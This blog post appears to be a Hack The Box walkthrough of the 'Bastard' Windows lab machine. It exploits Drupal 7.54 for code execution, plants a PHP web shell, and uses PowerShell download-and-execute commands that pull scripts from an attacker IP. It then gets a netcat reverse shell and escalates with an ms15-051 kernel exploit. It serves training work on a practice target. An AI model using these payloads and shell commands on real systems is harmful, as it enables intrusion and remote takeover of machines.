---
title: "Bastard Hackthebox"
date: 2021-03-29T04:32:03+02:00
draft: false
image: "/static/HACKING/bastard-icon.png"
categories:
    - Hack-The-Box
---

![<- Not working](/static/HACKING/bastard-index.jpg)

# [*] INDEX: 

- [BOX INFO](#-box-info--)
- [GAINING ACCESS](#-part-1---gain-access)
- [PRIVILEGE ESCALATION](#-part-2---privesc)

# [+] BOX INFO 💻 :

```
Operative System : Windows 🌐
Difficulty : Medium 🌓
Owner : ch4p
IP : 10.10.10.9
```
# [+] PART 1 - GAIN ACCESS

The first step is scanning machine's ports with nmap:

> [nmap -p- --open -T5 -n 10.10.10.9](https://explainshell.com/explain?cmd=nmap+-p-+--open+-T5+-n+10.10.10.9)

```
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
49154/tcp open  unknown
```

Once seen open ports, let's get a deeper scan :

> [nmap -sV -sC -sS -p80,135,49154 10.10.10.9](https://explainshell.com/explain?cmd=nmap+-sC+-sV+-sS+-p80%2C135%2C49154+10.10.10.9)

```
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

Here we just can point out the http server, so, let's check it : 

![<- Not working](/static/HACKING/bastard-1.png)

We can see a content manager called Drupal, we see that the service version is the 7, but this is nos specified, so, let's get a Drupal Scanner to get it's service : 

In my case I used a [github script](https://github.com/immunIT/drupwn) :

> ./drupwn --mode enum --target http://10.10.10.9

![<- Not working](/static/HACKING/bastard-2.png)

Nice, so the Drupal version running on the website is the `7.54`. Let's search for an exploit for this version :

![<- Not working](/static/HACKING/bastard-3.png)

I found a ruby exploit which looks good, let's execute it :

> ruby drupalgeddon2.rb http://10.10.10.9/ 

![<- Not working](/static/HACKING/bastard-4.png)

Yeah! We got a shell as the "iusr", but this shell works too slow, so I decided to search for another one. 

![<- Not working](/static/HACKING/bastard-5.png)

This php RCE exploit looks interesting, but probably we need to change some parameters, let's inspect the script:

Looking inside the script I found this :

```php
$url = 'http://vmweb.lan/drupal-7.54'; <-- Change this to http://10.10.10.9
$endpoint_path = '/rest_endpoint';
$endpoint = 'rest_endpoint';
```

/rest_endpoint looks interesting, let's see in the browser what's in there : 

![<- Not working](/static/HACKING/bastard-6.png)

Hmmm here it says that it doesn't exists, without this endpoint our script won't work, so let's tru to fuzz the website to find the "real" rest_enpoint, in my case I'll be using `wfuzz` :

> wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.9/FUZZ --hc=404 -L

```s
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.9/FUZZ
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                           
=====================================================================
                                                        
000000014:   200        159 L    413 W      7583 Ch     "http://10.10.10.9"                                                         
000000125:   200        152 L    394 W      7420 Ch     "user"                                                                            
000000124:   200        159 L    413 W      7583 Ch     "0"                                                                               
000000352:   200        159 L    413 W      7583 Ch     "node"                                                                                
000004935:   200        0 L      7 W        62 Ch       "rest"     
```

Oh, maybe rest is our endpoint, let's change that part of the code : 

```php
$url = 'http://10.10.10.9'; 
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
```

If we keep looking the script, we find this :

```php
$file = [
    'filename' => 'dixuSOspsOUU.php',
    'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'
];
```

Here is where the exploit sets the payload, and we can change it a bit to get a shell with a parameter.

```php
$file = [
    'filename' => 'shell.php',
    'data' => '<?php system($_REQUEST["cmd"]); ?>'
];
```

Let's try to run the script...

![<- Not working](/static/HACKING/bastard-7.png)

Nice, it seems to have worked, let's try to run a command in the browser :

![<- Not working](/static/HACKING/bastard-8.png)

Yes! It worked! Now let's try to get a reverse shell, I'll be using [Invoke-PowerShellTcp.ps1](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) from nishang, all we have to do to set the script up is adding the function at the bottom of the code, like this :

![<- Not working](/static/HACKING/bastard-9.png)

Now we'll be running that script with victim's powershell, using IEX (Invoke-Expression). We put this on the website but first we have to open a python http.server to share the file, and then powershell will get the file you're sharing and execute it : 

### From our local machine : 

> [python3 -m http.server](https://explainshell.com/explain?cmd=python3+-m+http.server)

And start listening from our pott 8989

> [rlwrap nc -lvnp 8989](https://explainshell.com/explain?cmd=rlwrap+nc+-lvnp+8989)

### From the victime machine : 

> http://10.10.10.9/shell.php?cmd=C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe iex (New-Object Net.WebClient).DownloadString('http://10.10.14.36:8000/Invoke-PowerShellTcp.ps1)

![<- Not working](/static/HACKING/bastard-10.png)

And yeah! It worked :smile: 

# [+] PART 2 - PRIVESC

Now running `sysinfo` we can get this : 

```
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 ??
System Boot Time:          28/3/2021, 1:51:13 ??
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.514 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.541 MB
Virtual Memory: In Use:    554 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9
```

Hmmm windows server 2008 sounds quite familiar, maybe it's vulnerable to some kind of kernel exploit? Let's get a Vuln-Scan script for this, in my case I'll be using [Sherlock.ps1](https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1). Inspecting Sherlock code, we find a function called "Find-AllVulns", just put it at the bottom as we did with the reverse shell :

![<- Not working](/static/HACKING/bastard-11.png)

Let's start a python http server again and get the file from the browser : 

### From our local machine : 

> [python3 -m http.server](https://explainshell.com/explain?cmd=python3+-m+http.server)

### From the victim browser : 

> http://10.10.10.9/shell.php?cmd=powershell%20iex%20(New-Object%20Net.WebClient).DownloadString(%27http://10.10.14.36:8000/Sherlock.ps1%27)

Once done that, we can run commands as sudo as we can see here :

![<- Not working](/static/HACKING/bastard-12.png)

But we're not actually getting a shell, victim machine doesn't have netcat, so let's download a [netcat64 binary](https://github.com/int0x33/nc.exe/blob/master/nc64.exe?source=post_page-----a2ddc3557403----------------------) and get it into the victim system. 

### From our local machine : 

> impacket-smbserver id binaries/

### From the victim browser : 

> copy \\10.10.14.36\id\nc64.exe

And get a reverse shell: 

![<- Not working](/static/HACKING/bastard-13.png)

I don't know why this is not actually running, but we can try luck in the browser.

> http://10.10.10.9/shell.php?cmd=ms15-051x64.exe%20%22nc64.exe%20-e%20cmd%2010.10.14.36%204444%22

![<- Not working](/static/HACKING/bastard-14.png)

![<- Not working](/static/HACKING/bastard-15.png)

# THANKS FOR READING 😊 !!